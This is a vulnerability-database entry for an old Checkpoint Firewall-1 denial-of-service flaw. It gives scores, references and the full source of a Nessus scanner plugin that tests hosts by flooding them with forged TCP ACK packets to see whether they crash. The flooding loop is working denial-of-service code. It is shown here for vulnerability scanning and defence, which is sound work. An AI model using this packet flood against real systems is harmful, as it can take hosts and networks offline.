Vulnerabilities > CVE-1999-0770 - Unspecified vulnerability in Checkpoint Firewall-1 3.0/4.0

047910
CVSS 2.1 - LOW
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
local
low complexity
checkpoint
nessus
exploit available
NVD
Published: 1999-07-29
Updated: 2008-09-09

Summary

Firewall-1 sets a long timeout for connections that begin with ACK or other packets except SYN, allowing an attacker to conduct a denial of service via a large number of connection attempts to unresponsive systems.

Vulnerable Configurations

Part Description Count
Application
Checkpoint
2

Exploit-Db

descriptionCheck Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability. CVE-1999-0770. Dos exploit for hardware platform
idEDB-ID:19436
last seen2016-02-02
modified1999-07-29
published1999-07-29
reporterLance Spitzner
sourcehttps://www.exploit-db.com/download/19436/
titleCheck Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability

Nessus

NASL familyDenial of Service
NASL idSTREAM.NASL
descriptionIt seems it was possible to make the remote server crash using the
last seen2020-06-01
modified2020-06-02
plugin id10271
published2000-01-21
reporterThis script is Copyright (C) 2000-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10271
titleTCP/IP ACK Packet Saturation Remote DoS (stream.c)
code
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: domain no longer exists)
#      Added links to the Bugtraq message archive
#

include("compat.inc");

if (description)
{
 script_id(10271);
 script_version("1.34");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0770");
 script_bugtraq_id(549);

 script_name(english:"TCP/IP ACK Packet Saturation Remote DoS (stream.c)");
 script_summary(english:"Crashes the remote host using the 'stream' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It seems it was possible to make the remote server crash using the
'stream' (or 'raped') attack.

An attacker may use this flaw to shut down this server, thus
preventing your network from working properly.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Jul/247");
 script_set_attribute(attribute:"solution", value:
"Solution :

Contact your operating system vendor for a patch.

- If you use IP filter, then add these rules :

  block in quick proto tcp from any to any head 100
  pass in quick proto tcp from any to any flags S keep state group 100
  pass in all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/07/29");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/01/21");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_FLOOD);
 script_copyright(english:"This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);


if ( TARGET_IS_IPV6 ) exit(0);
addr = compat::this_host();
id = rand();
sport = rand();
seq = rand();

port = get_host_open_port();
if(!port)port = rand() % 65535;


start_denial();
for(i=0;i<40000;i=i+1)
{
 id = id + 1;
 sport = sport + 1;
 seq  = seq+1;
 ip = forge_ip_packet(   ip_v : 4,
			ip_hl : 5,
			ip_tos : 0x08,
			ip_len : 20,
		        ip_id : id,
			ip_p : IPPROTO_TCP,
			ip_ttl : 255,
		        ip_off : 0,
			ip_src : addr);

 tcpip = forge_tcp_packet(    ip      : ip,
			     th_sport : sport,
			     th_dport : port,
			     th_flags : TH_ACK,
		             th_seq   : seq,
			     th_ack   : 0,
			     th_x2    : 0,
		 	     th_off   : 5,
			     th_win   : 2048,
			     th_urp   : 0);


 send_packet(tcpip, pcap_active:FALSE);
}
sleep(5);
alive = end_denial();

if(!alive)     {
                set_kb_item(name:"Host/dead", value:TRUE);
                security_hole(0);
                }

References